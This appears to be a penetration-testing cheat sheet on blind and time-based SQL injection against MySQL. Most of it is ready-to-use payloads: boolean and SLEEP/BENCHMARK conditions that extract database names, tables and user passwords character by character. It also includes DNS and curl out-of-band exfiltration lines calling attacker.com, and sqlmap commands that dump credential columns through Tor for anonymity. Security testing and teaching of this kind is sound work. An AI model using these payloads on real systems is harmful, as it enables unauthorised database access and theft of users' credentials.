open to work
MySQL Security

MySQL Blind & Time-based Attacks

Youssef
17 May 2026

MySQL Blind & Time-based SQL Injection

When to Use Blind Techniques

Blind injection is required when the application returns no database errors or query results — only a true/false or delayed response. This covers the majority of real-world injection scenarios since developers often suppress error output in production.

  • Boolean-based blind — application behavior changes based on true/false condition
  • Time-based blind — no visible change; use SLEEP() to confirm and extract data
  • Out-of-band — DNS or HTTP callbacks when no in-band channel is available

Boolean-Based — Detection

-- The page behaves differently for true vs false
?id=1 AND 1=1-- -      → page loads normally (TRUE)
?id=1 AND 1=2-- -      → different response or empty (FALSE)

-- String-based injection
?id=1' AND '1'='1'-- - → TRUE
?id=1' AND '1'='2'-- - → FALSE

-- Confirm MySQL specifically
?id=1 AND SLEEP(0)=0-- -         → TRUE (MySQL-specific)
?id=1 AND MID(version(),1,1)='5' → TRUE if MySQL 5.x

Boolean-Based — Data Extraction

-- Extract database name character by character
?id=1 AND SUBSTRING(database(),1,1)='a'-- -   → T/F
?id=1 AND ASCII(SUBSTRING(database(),1,1))>96-- - → binary search

-- Extract all databases
?id=1 AND SUBSTRING((SELECT group_concat(schema_name) FROM information_schema.schemata),1,1)='i'-- -

-- Extract table names
?id=1 AND SUBSTRING((SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()),1,1)='u'-- -

-- Extract user credentials
?id=1 AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='5'-- -

-- Optimized: use BETWEEN for fewer requests
?id=1 AND ASCII(SUBSTRING(database(),1,1)) BETWEEN 97 AND 122-- - → lowercase letter

Time-Based — SLEEP()

-- Basic confirmation
?id=1 AND SLEEP(5)-- -     → 5 second delay confirms injectable

-- Conditional time-based extraction
?id=1 AND IF(ASCII(SUBSTRING(database(),1,1))=105,SLEEP(3),0)-- -
-- Measure response time: ≥3s = TRUE, instant = FALSE

-- Extract version
?id=1 AND IF(SUBSTRING(version(),1,1)='8',SLEEP(3),0)-- -

-- Extract credentials one char at a time
?id=1 AND IF(ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>64,SLEEP(2),0)-- -

BENCHMARK() Alternative

-- When SLEEP() is filtered/blocked by WAF
-- BENCHMARK(count, expr) repeats expr N times — causes CPU delay

-- Basic detection
?id=1 AND BENCHMARK(50000000,MD5('x'))-- -    → ~2-3 seconds

-- Conditional extraction
?id=1 AND IF(ASCII(SUBSTRING(database(),1,1))=105,BENCHMARK(20000000,MD5('x')),0)-- -

-- Heavy query (no built-in functions, harder to filter)
?id=1 AND (SELECT count(*) FROM information_schema.columns A,
           information_schema.columns B,
           information_schema.columns C)-- -

Out-of-Band via DNS

-- Windows MySQL (UNC path causes DNS lookup)
?id=1 AND LOAD_FILE(concat('\\\\',(SELECT version()),'.attacker.com\\share'))-- -
-- DNS query for: 8.0.xxx.attacker.com → confirmed AND version revealed

-- Linux (requires UDF or outbound HTTP)
?id=1 AND sys_eval(concat('curl "http://attacker.com/?v=',version(),'"'))-- -

-- Use Burp Collaborator or interactsh for DNS reception:
-- interactsh-client -v
-- Use generated URL: xxxxxxx.interact.sh

Automating with sqlmap

-- Force Boolean-based only
sqlmap -u "http://target.com/page?id=1" --technique=B --level=5 --risk=3

-- Force Time-based only
sqlmap -u "http://target.com/page?id=1" --technique=T --time-sec=3

-- Increase threads for speed (time-based is slow)
sqlmap -u "URL" --technique=T --threads=1   -- keep at 1 for accuracy

-- Dump specific data
sqlmap -u "URL" -D targetdb -T users -C username,password --dump

-- With request file (from Burp)
sqlmap -r request.txt --dbms=mysql --technique=BT --level=5

-- Use tor for anonymity
sqlmap -u "URL" --tor --tor-type=SOCKS5 --check-tor

Optimizing Speed

-- Use binary search instead of linear (50% fewer requests)
-- linear: test 'a', 'b', 'c'... = up to 128 requests per char
-- binary: test >64, >96, >112... = 7 requests per char

-- sqlmap uses binary search by default

-- For manual binary search:
?id=1 AND ASCII(SUBSTRING(target,POS,1)) BETWEEN LOW AND HIGH-- -

-- Reduce SLEEP time to minimum that network can detect reliably
-- LAN: 1 second is reliable
-- Internet: 3-5 seconds recommended

Key Insight: Time-based blind is the most universal technique — it works even when the application returns identical responses for all inputs (no boolean difference). The tradeoff is speed: a single column value of 32 chars can take 100+ requests. Always confirm with 2-3 different payloads before starting full extraction.